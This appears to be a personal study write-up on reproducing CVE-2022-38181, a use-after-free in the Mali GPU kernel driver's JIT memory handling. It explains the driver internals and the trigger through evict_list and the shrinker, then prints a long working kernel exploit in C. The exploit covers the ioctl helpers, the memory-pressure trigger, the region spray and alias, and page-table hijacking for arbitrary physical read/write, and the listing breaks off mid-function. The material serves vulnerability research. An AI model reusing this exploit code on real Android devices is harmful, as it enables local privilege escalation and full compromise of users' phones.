Mali GPU CVE-2022-38181 Vulnerability Reproduction


CVE-2022-38181

Reference: https://github.blog/security/vulnerability-research/pwning-the-all-google-phone-with-a-non-google-bug/

If you read English comfortably, the author's original write-up linked above is easier to follow. This post is only my own study notes.

Many other types of GPU memory are created directly via ioctl calls such as KBASE_IOCTL_MEM_IMPORT. JIT memory regions, however, are special: they are created by submitting a special GPU instruction through the KBASE_IOCTL_JOB_SUBMIT ioctl.

The KBASE_IOCTL_JOB_SUBMIT ioctl is used to submit a "job chain" to the GPU for processing. Although KBASE_IOCTL_JOB_SUBMIT is normally used to send instructions to the GPU itself, some jobs are implemented in the kernel and run on the CPU. These are software jobs ("softjobs"), and they include the jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE).
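
As a concrete illustration, here is a condensed user-space sketch of submitting a single BASE_JD_REQ_SOFT_JIT_ALLOC soft job. It is adapted from the jit_allocate() helper in the final exploit at the end of this post and assumes the same Mali kbase UAPI headers used there:

#include <stdint.h>
#include <sys/ioctl.h>
#include "mali.h"                  /* kbase UAPI definitions, as in the final exploit */
#include "mali_base_jm_kernel.h"

/* Submit one BASE_JD_REQ_SOFT_JIT_ALLOC soft job. The kernel writes the GPU
 * address of the newly created JIT region to *(uint64_t *)gpu_alloc_addr. */
static int submit_jit_alloc(int mali_fd, uint8_t atom_number, uint8_t jit_id,
                            uint64_t va_pages, uint64_t gpu_alloc_addr)
{
    struct base_jit_alloc_info info = {0};
    struct base_jd_atom_v2 atom = {0};
    struct kbase_ioctl_job_submit submit = {0};

    info.id = jit_id;                       /* index into kctx->jit_alloc */
    info.gpu_alloc_addr = gpu_alloc_addr;   /* GPU-visible buffer receiving the result */
    info.va_pages = va_pages;
    info.commit_pages = va_pages;
    info.extension = 0x1000;

    atom.jc = (uint64_t)&info;              /* soft jobs carry a CPU pointer, not GPU code */
    atom.atom_number = atom_number;
    atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
    atom.nr_extres = 1;

    submit.addr = (uint64_t)&atom;
    submit.nr_atoms = 1;
    submit.stride = sizeof(struct base_jd_atom_v2);
    return ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit);
}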

The life cycle of JIT memory

While KBASE_IOCTL_JOB_SUBMIT is a general-purpose ioctl containing code paths for handling different types of GPU jobs, a BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which in turn calls kbase_jit_allocate to create a JIT memory region.

To understand the life cycle and usage of JIT memory, a few concepts need to be introduced first.

To use the Mali GPU driver, a user application first needs to create and initialize a kbase_context kernel object. This involves the application opening the driver file and issuing a series of ioctl calls on the resulting file descriptor.

The kbase_context object manages the resources allocated for each open driver file, and each file handle has its own unique kbase_context. In particular, it has three list_head fields used to manage JIT memory: jit_active_head, jit_pool_head, and jit_destroy_head. As their names suggest, jit_active_head holds the memory currently in use by the user application, jit_pool_head holds unused memory regions, and jit_destroy_head holds memory regions waiting to be freed and returned to the kernel.

Although both jit_pool_head and jit_destroy_head manage free JIT regions, jit_pool_head acts as a memory pool holding JIT regions intended to be reused when new JIT regions are allocated, while jit_destroy_head holds memory that is about to be returned to the kernel.
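
For orientation, below is a simplified sketch of the relevant bookkeeping fields. The field names follow the kbase driver source; everything else is omitted, and the list_head stand-in exists only so the sketch compiles outside the kernel tree:

/* Minimal stand-in for the kernel's struct list_head so this sketch is
 * self-contained; in the driver these are real kernel lists. */
struct list_head { struct list_head *next, *prev; };

struct kbase_va_region;

/* Simplified excerpt of struct kbase_context (most fields omitted). */
struct kbase_context {
    struct list_head jit_active_head;       /* JIT regions in use by user space */
    struct list_head jit_pool_head;         /* freed JIT regions kept for reuse */
    struct list_head jit_destroy_head;      /* JIT regions about to be returned to the kernel */
    struct list_head evict_list;            /* allocations reclaimable under memory pressure */
    struct kbase_va_region *jit_alloc[256]; /* regions indexed by the user-chosen JIT id */
};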

kbase_jit_allocate 被调用时,JIT 内存管理器首先会尝试从 jit_pool_head 中寻找适合的区域:

if (info->usage_id != 0)
    /* First scan for an allocation with the same usage ID */
    reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
...
if (reg) {
    ...
    list_move(&reg->jit_node, &kctx->jit_active_head);

If a suitable region is found, it is moved to jit_active_head, indicating that it is now in use by user space. Otherwise, a new memory region is created and added to jit_active_head. The region returned by kbase_jit_allocate (whether newly created or reused from jit_pool_head) is then stored by its caller, kbase_jit_allocate_process, in the jit_alloc array of the kbase_context.

(Figure: kbase_jit_allocate)

(Figure: kbase_jit_grow)

When the user no longer needs a JIT region, a BASE_JD_REQ_SOFT_JIT_FREE job can be sent to the GPU, and the kernel then uses kbase_jit_free to free the memory. However, kbase_jit_free does not immediately return the region's backing pages to the kernel. Instead, it first shrinks the backing region to a minimal size and removes any CPU-side mappings, so the pages in the region can no longer be reached from the user process's address space:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    //First reduce the size of the backing region and unmap the freed pages
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        u64 new_size = MAX(reg->initial_commit,
                           div_u64(old_pages * (100 - kctx->trim_level), 100));
        u64 delta = old_pages - new_size;
        //Free delta pages in the region and reduces its size to old_pages - delta
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);
            mutex_unlock(&kctx->reg_lock);
        }
    }
    ...
    //Remove the pages from address space of user process
    kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);

At this stage, the backing pages of reg have not been completely removed, and reg itself is not freed here. Instead, reg is moved back to jit_pool_head, and it is also added to the evict_list of the kbase_context, as shown below:

kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
...
mutex_lock(&kctx->jit_evict_lock);
/* This allocation can't already be on a list. */
WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
//Add reg to evict_list
list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
//Move reg to jit_pool_head
list_move(&reg->jit_node, &kctx->jit_pool_head);

(Figure: kbase_jit_free)

After kbase_jit_free completes, kbase_jit_free_finish clears the reference stored in jit_alloc, even though reg is still valid at this point:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
    ...
    for (j = 0; j != katom->nr_extres; ++j) {
        if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
            ...
            if (kctx->jit_alloc[ids[j]] !=
                    KBASE_RESERVED_REG_JIT_ALLOC) {
                ...
                kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);
            }
            kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference
        }
    }
    ...
}

When the user allocates another JIT region, the free JIT regions in the jit_pool_head list may be reused. This explains the roles of jit_pool_head and jit_active_head.

When JIT memory (i.e., a JIT region) is freed via kbase_jit_free, it is also placed on the evict_list. Regions on the evict_list are regions that can be released when memory pressure arises; by putting unused JIT regions on the evict_list, the Mali driver keeps unused JIT memory around for fast reallocation while still being able to return it to the kernel when resources are needed.

shrinker

The Linux kernel provides a mechanism for reclaiming unused cached memory, called shrinkers. A kernel driver can define a shrinker object, which involves defining methods such as count_objects and scan_objects:

struct shrinker {
    unsigned long (*count_objects)(struct shrinker *,
                                   struct shrink_control *sc);
    unsigned long (*scan_objects)(struct shrinker *,
                                  struct shrink_control *sc);
    ...
};

A custom memory shrinker can be registered with register_shrinker. When the kernel is under memory pressure, it walks the list of registered shrinkers, uses their count_objects methods to determine how much memory can be freed, and then uses scan_objects to free it.
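
As a toy illustration (a hypothetical module, not code from the Mali driver), registering a shrinker with the one-argument register_shrinker() used by kernels of this era looks roughly like this:

#include <linux/module.h>
#include <linux/shrinker.h>

/* count_objects reports how many objects could be freed; scan_objects frees
 * up to sc->nr_to_scan of them and returns how many were actually freed. */
static unsigned long demo_count_objects(struct shrinker *s,
                                        struct shrink_control *sc)
{
    return 0;            /* nothing to reclaim in this toy example */
}

static unsigned long demo_scan_objects(struct shrinker *s,
                                       struct shrink_control *sc)
{
    return SHRINK_STOP;  /* tell the kernel to stop scanning us */
}

static struct shrinker demo_shrinker = {
    .count_objects = demo_count_objects,
    .scan_objects  = demo_scan_objects,
    .seeks         = DEFAULT_SEEKS,
};

static int __init demo_init(void)
{
    return register_shrinker(&demo_shrinker);
}

static void __exit demo_exit(void)
{
    unregister_shrinker(&demo_shrinker);
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");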

In the Mali GPU driver, the shrinker is defined and registered in kbase_mem_evictable_init:

int kbase_mem_evictable_init(struct kbase_context *kctx)
{
    ...
    //kctx->reclaim is a shrinker
    kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects;
    kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects;
    ...
    register_shrinker(&kctx->reclaim);
    return 0;
}

Next, let's look at kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing memory back to the kernel:

static
unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s,
        struct shrink_control *sc)
{
    ...
    list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) {
        int err;

        err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg,
                0, alloc->nents);
        ...
        kbase_free_phy_pages_helper(alloc, alloc->evicted);
        ...
        list_del_init(&alloc->evict_node);
        ...
        kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool`
    }
    ...
}

kbase_mem_evictable_reclaim_scan_objects walks the evict_list, unmaps the backing pages from the GPU (note that the CPU mappings were already removed in kbase_jit_free), and then frees the backing pages. Afterwards, it calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head:

void kbase_jit_backing_lost(struct kbase_va_region *reg)
{
    ...
    list_move(&reg->jit_node, &kctx->jit_destroy_head);

    schedule_work(&kctx->jit_work);
}

The memory regions in jit_destroy_head are then picked up by kbase_jit_destroy_worker, a worker that frees the kbase_va_region objects on jit_destroy_head and completely removes the references to them.

Normally, a JIT region is only moved to the evict_list when the user frees it with a BASE_JD_REQ_SOFT_JIT_FREE job, and that job also removes the reference stored in jit_alloc.

The vulnerability

Evictable memory is more general than JIT memory: other types of GPU memory can also be added to the evict_list, making them evictable. This is done by calling kbase_mem_evictable_make to add a memory region to the evict_list, and kbase_mem_evictable_unmake to remove it.

From user space, these operations can be reached through the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl, which adds a memory region to the evict_list or removes it from the evict_list depending on the BASE_MEM_DONT_NEED flag:

int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask)
{
    ...
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
    if (prev_needed != new_needed) {
        ...
        if (new_needed) {
            ...
            ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list`
            if (ret)
                goto out_unlock;
        } else {
            kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list`
        }
    }

By putting a JIT memory region directly on the evict_list and then applying memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region ends up being freed even though a pointer to it is still stored in jit_alloc.
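
In user space this boils down to two steps, sketched here with the mem_flags_change() and flush() helpers defined in the final exploit below: mark the still-referenced JIT region as BASE_MEM_DONT_NEED so it lands on the evict_list, then allocate and touch anonymous memory until the shrinker fires.

/* Sketch of the trigger, using helpers from the final exploit below.
 * jit_addr is the GPU address returned by the BASE_JD_REQ_SOFT_JIT_ALLOC job. */
static void evict_jit_region(int mali_fd, uint64_t jit_addr, void **flush_regions)
{
    /* Put reg on the evict_list even though jit_alloc still references it. */
    mem_flags_change(mali_fd, jit_addr, BASE_MEM_DONT_NEED, 0);

    /* Create memory pressure: each flush() maps and dirties 16 MiB, so after
     * enough iterations the shrinker reclaims the DONT_NEED JIT region. */
    for (int i = 0; i < 100; i++)
        flush_regions[i] = flush(0, i);
}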

After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted, which triggers kbase_jit_free_finish on the already-freed object still referenced by jit_alloc:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
    ...
    for (j = 0; j != katom->nr_extres; ++j) {
        if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
            ...
            if (kctx->jit_alloc[ids[j]] !=
                    KBASE_RESERVED_REG_JIT_ALLOC) {
                ...
                kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]]
            }
            kctx->jit_alloc[ids[j]] = NULL;
        }
    }

In particular, kbase_jit_free first frees some of the backing pages of the already-freed kctx->jit_alloc[ids[j]]:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        ...
        u64 delta = old_pages - new_size;
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region
            mutex_unlock(&kctx->reg_lock);
        }
    }

By replacing the freed JIT region with a fake object, an arbitrary free can therefore be achieved.

Exploiting

Key points:

The KBASE_IOCTL_MEM_QUERY ioctl lets the user check whether a given GPU address lies in a valid memory region. If the JIT memory has been freed, the call returns an error, so it can be used to detect whether the JIT region has been released (this approach is also mentioned in GHSL-2023-005); see the sketch after these notes.

The kbase_va_region of a JIT region is allocated from the kmalloc-256 slab cache.
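
A condensed version of that check, based on the loop in trigger() in the final exploit:

#include <stdbool.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include "mali.h"   /* kbase UAPI definitions, as in the final exploit */

/* Returns true once KBASE_IOCTL_MEM_QUERY fails for the region's GPU address,
 * i.e. once the JIT region has been torn down by the shrinker. */
static bool jit_region_freed(int mali_fd, uint64_t jit_addr)
{
    union kbase_ioctl_mem_query query = {0};
    query.in.gpu_addr = jit_addr;
    query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
    return ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0;
}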

Replacing the freed object

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        ...
        u64 delta = old_pages - new_size;
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region
            mutex_unlock(&kctx->reg_lock);
        }
    }

In the code above, kbase_mem_shrink is called on the freed JIT region. One option would be to reclaim that chunk with a sendmsg heap spray and overwrite it with a fake kbase_va_region; by controlling the pages field of its gpu_alloc, we could then achieve an arbitrary page free.

int kbase_mem_shrink(struct kbase_context *const kctx,
        struct kbase_va_region *const reg, u64 new_pages)
{
    ...
    err = kbase_mem_shrink_gpu_mapping(kctx, reg,
            new_pages, old_pages);
    if (err >= 0) {
        /* Update all CPU mapping(s) */
        kbase_mem_shrink_cpu_mapping(kctx, reg,
                new_pages, old_pages);
        kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc
        if (reg->cpu_alloc != reg->gpu_alloc)
            kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc

In practice, however, overwriting the chunk via sendmsg has many factors to get right: a JIT region carries a lot of state, many operations are only valid in a specific state, and we would probably also need an address leak to locate the memory we want to control. Both points make exploitation considerably harder.

Overall, that approach is not very practical. Instead of spraying foreign objects, we can reuse the Mali driver's own objects, for example a region allocated via mem_alloc (KBASE_IOCTL_MEM_ALLOC). Remember that kctx->jit_alloc[ids[j]] will then point at this new object, because when the shrinker reclaimed the memory it never cleared that pointer, leaving it dangling.

Here we can reuse the memory-alias trick from CVE-2022-20186: when the region is freed, only the mappings of reg itself are removed, while the mappings in the alias region remain and can still be used to access the freed backing pages.

Note: kbase_mem_shrink may only be called when the kbase_va_region is not mapped more than once (a memory alias, for example, adds an extra mapping).

At the same time, kbase_mem_alias checks the KBASE_REG_NO_USER_FREE flag to forbid aliasing JIT regions:

u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
        u64 nents, struct base_mem_aliasing_info *ai,
        u64 *num_pages)
{
    ...
    for (i = 0; i < nents; i++) {
        if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) {
            if (ai[i].handle.basep.handle !=
                    BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE)
            ...
        } else {
            ...
            if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2.
                goto bad_handle; /* JIT regions can't be
                                  * aliased. NO_USER_FREE flag
                                  * covers the entire lifetime
                                  * of JIT regions. The other
                                  * types of regions covered
                                  * by this flag also shall
                                  * not be aliased.
            ...
        }

So, using the vulnerability described above, the freed JIT region is replaced by a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl (the same type of object, but without the KBASE_REG_NO_USER_FREE flag), and then KBASE_IOCTL_MEM_ALIAS is used to create an extra mapping of this new region's backing store.

These operations are all valid because the newly allocated region does not have the KBASE_REG_NO_USER_FREE flag set, so it can be aliased. However, because of the bug, a dangling pointer in jit_alloc now also points to this new, now aliased, region.

If a BASE_JD_REQ_SOFT_JIT_FREE job is now submitted so that kbase_jit_free is called on this memory, kbase_mem_shrink will be invoked and part of the new region's backing store will be freed, but the extra mapping created in the alias region is not removed. This means the freed backing pages can still be accessed through the alias region.

Using a real object of the same type not only avoids the trouble of crafting a fake object, it also reduces the risk of crash-inducing side effects.
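
The corresponding call sequence, using the helpers defined in the final exploit below (spray_mem, mem_commit, alias_sprayed_regions, fault_pages), looks roughly like this:

/* Call-sequence sketch of the reclaim-and-alias step; all helpers and the
 * gpu_va[] / SPRAY_* globals come from the final exploit below. */
static uint64_t reclaim_and_alias(int mali_fd)
{
    /* Spray ordinary KBASE_IOCTL_MEM_ALLOC regions (no KBASE_REG_NO_USER_FREE)
     * so one of them reuses the freed kbase_va_region. */
    spray_mem(mali_fd, 1);

    /* Give every sprayed region backing pages. */
    for (int j = 0; j < SPRAY_NUM; j++)
        mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES);

    /* Second GPU mapping of all sprayed regions; this mapping is not removed
     * when kbase_mem_shrink later frees part of the backing store. */
    uint64_t alias_base = alias_sprayed_regions(mali_fd);

    /* Touch both mappings so the pages are actually populated. */
    fault_pages();
    return alias_base;
}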

The rest of the exploit again works by reclaiming the freed backing pages as PGDs, hijacking the page tables to obtain arbitrary physical memory read/write.
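
To locate a reclaimed page table in the aliased mapping, the exploit below (find_pgd) uses the heuristic that valid Mali page-table entries carry the attribute bits 0x443 in their low bits; a condensed version of that check looks like this:

#include <stdint.h>

/* Heuristic used by find_pgd() in the final exploit: a 4 KiB page whose
 * 64-bit entries have the low bits 0x443 set looks like a Mali page table. */
static int looks_like_pgd(const uint64_t *page /* 0x1000 bytes */)
{
    for (int i = 0; i < 0x1000 / 8; i++)
        if ((page[i] & 0x443) == 0x443)
            return 1;
    return 0;
}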

(Figure: effect after the page-table pages have been reclaimed)

Exploitation steps

  • jit_allocate: allocate a jit_region
  • mem_flags_change: mark the jit_region as BASE_MEM_DONT_NEED
  • flush: create memory pressure so the shrinker runs, releasing the jit_region back to the mem_pool
  • mem_alloc spray: reclaim the UAF'd jit region from the mem_pool
  • create an alias region for the memory obtained from mem_alloc
  • drain_mem_pool: drain the mem_pool
  • release_mem_pool: fill the mem_pool back up
  • jit_free: free the jit_region that is still referenced by the dangling pointer
  • reserved regions: spray PGDs
  • after that, the usual write operations follow

Final result

(Figure: final result)

Summary

For Mali GPU work, it is essential to read a lot of the source code, especially the JIT memory management, focusing on kbase_jit_allocate and kbase_jit_free. Go through every call and every detail inside them; that way you understand why the exploit is written the way it is, and your grasp and observation of the vulnerability become much more precise.

final exp

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include "stdbool.h"
#include <sys/system_properties.h>
#include <sys/syscall.h>

#include "mali.h"
#include "mali_base_jm_kernel.h"
#include "midgard.h"

#ifdef SHELL
#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
#else
#include <android/log.h>
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
#endif

#define MALI_PATH "/dev/mali0"
#define TOTAL_RESERVED_SIZE 1024
#define RESERVED_SIZE 32
#define FLUSH_SIZE 0x1000*0x1000
#define SPRAY_PAGES 25
#define SPRAY_NUM 64
#define POOL_SIZE 16384
#define FLUSH_REGION_SIZE 500

int mali_fd, mali_fd2;
static uint8_t atom_number = 1;
static uint8_t jit_id = 1;
static uint64_t reserved[TOTAL_RESERVED_SIZE/ RESERVED_SIZE];
static uint64_t gpu_va[SPRAY_NUM] = {0};
static void* alias_regions[SPRAY_NUM] = {0};
static void* flush_regions[FLUSH_REGION_SIZE];

struct base_mem_handle {
struct {
__u64 handle;
} basep;
};

struct base_mem_aliasing_info {
struct base_mem_handle handle;
__u64 offset;
__u64 length;
};

int open_dev(char* name){
int fd = open(name, O_RDWR);
if (fd < 0) err(1, "cannot open %s\n", name);
return fd;
}

void print_binary(void *addr, int len) {
size_t *buf64 = (size_t *) addr;
char *buf8 = (char *) addr;
for (int i = 0; i < len / 8; i += 2) {
printf(" %04x", i * 8);
for (int j = 0; j < 2; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 16 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

void print_addr(char* name, uint64_t addr) {
printf("[+] %s == 0x%lx\n", name, addr);
}

#define CPU_SETSIZE 1024
#define __NCPUBITS (8 * sizeof (unsigned long))
typedef struct
{
unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;

#define CPU_SET(cpu, cpusetp) \
((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
#define CPU_ZERO(cpusetp) \
memset((cpusetp), 0, sizeof(cpu_set_t))

int migrate_to_cpu(int i)
{
int syscallres;
pid_t pid = gettid();
cpu_set_t cpu;
CPU_ZERO(&cpu);
CPU_SET(i, &cpu);

syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
if (syscallres)
{
return -1;
}
return 0;
}

void setup_mali(int fd, int group_id) {
struct kbase_ioctl_version_check param = {0};
if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
err(1, "version check failed\n");
}
struct kbase_ioctl_set_flags set_flags = {group_id << 3};
if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
err(1, "set flags failed\n");
}
}

void* setup_tracking_page(int fd) {
void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
if (region == MAP_FAILED) {
err(1, "setup tracking page failed");
}
return region;
}

void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0){
err(1, "mem_alloc failed\n");
}
}

void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
err(1, "mem_alias failed\n");
}
}

void mem_query(int fd, union kbase_ioctl_mem_query* query) {
if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
err(1, "mem_query failed\n");
}
}

void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, .pages = pages};
if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
err(1, "mem_commit failed\n");
}
}

void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results){
struct kbase_ioctl_mem_flags_change change = {0};
change.flags = flags;
change.gpu_va = gpu_addr;
change.mask = flags;
if (ignore_results) {
ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
return;
}
if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0){
err(1, "flags change failed\n");
}
}

uint64_t drain_mem_pool(int mali_fd) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
int prot = PROT_READ | PROT_WRITE;
alloc.in.va_pages = POOL_SIZE;
alloc.in.commit_pages = POOL_SIZE;
mem_alloc(mali_fd, &alloc);
return alloc.out.gpu_va;
}

void release_mem_pool(int mali_fd, uint64_t drain) {
struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
err(1, "free_mem failed\n");
}
}

void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
int prot = PROT_READ;
if (!read_only) {
alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
prot |= PROT_WRITE;
}
alloc.in.va_pages = va_pages;
alloc.in.commit_pages = commit_pages;
mem_alloc(mali_fd, &alloc);
void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
return region;
}

void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
struct kbase_ioctl_mem_jit_init init = {0};
init.va_pages = va_pages;
init.max_allocations = 255;
init.trim_level = trim_level;
init.group_id = group_id;
init.phys_pages = va_pages;

if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
err(1, "jit init failed\n");
}
}

uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) {
struct base_jit_alloc_info info = {0};
struct base_jd_atom_v2 atom = {0};

info.id = id;
info.gpu_alloc_addr = gpu_alloc_addr;
info.va_pages = va_pages;
info.commit_pages = va_pages;
info.extension = 0x1000;

atom.jc = (uint64_t)(&info);
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
atom.nr_extres = 1;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
return *((uint64_t*)gpu_alloc_addr);
}


void jit_free(int fd, uint8_t atom_number, uint8_t id) {
uint8_t free_id = id;

struct base_jd_atom_v2 atom = {0};

atom.jc = (uint64_t)(&free_id);
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
atom.nr_extres = 1;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
}

void* flush(int spray_cpu, int idx){
migrate_to_cpu(spray_cpu);
void* region = mmap(NULL, FLUSH_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (region == MAP_FAILED) err(1, "flush failed");
//trigger page fault to allocate physical page
memset(region, idx, FLUSH_SIZE);
return region;
}

void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va, int group_id) {
for (int i = 0; i < nents; i++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (group_id << 22);
int prot = PROT_READ | PROT_WRITE;
alloc.in.va_pages = pages;
alloc.in.commit_pages = pages;
mem_alloc(mali_fd, &alloc);
reserved_va[i] = alloc.out.gpu_va;
}
}

void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
for (int i = 0; i < nents; i++) {
void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
if (reserved == MAP_FAILED) {
err(1, "mmap reserved failed");
}
reserved_va[i] = (uint64_t)reserved;
}
}

int find_freed_idx(int mali_fd) {
int freed_idx = -1;
for (int j = 0; j < SPRAY_NUM; j++) {
union kbase_ioctl_mem_query query = {0};
query.in.gpu_addr = gpu_va[j];
query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query);
if (query.out.value != SPRAY_PAGES) {
LOG("jit_free commit: %d %llu\n", j, query.out.value);
freed_idx = j;
}
}
return freed_idx;
}

int find_pgd(int freed_idx, int start_pg) {
uint64_t* this_alias = alias_regions[freed_idx];
for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
printf("============== this_alias[%d * 0x1000/8] ==============\n", pg);
print_binary((void *)&this_alias[pg * 0x1000/8], 0x1000);
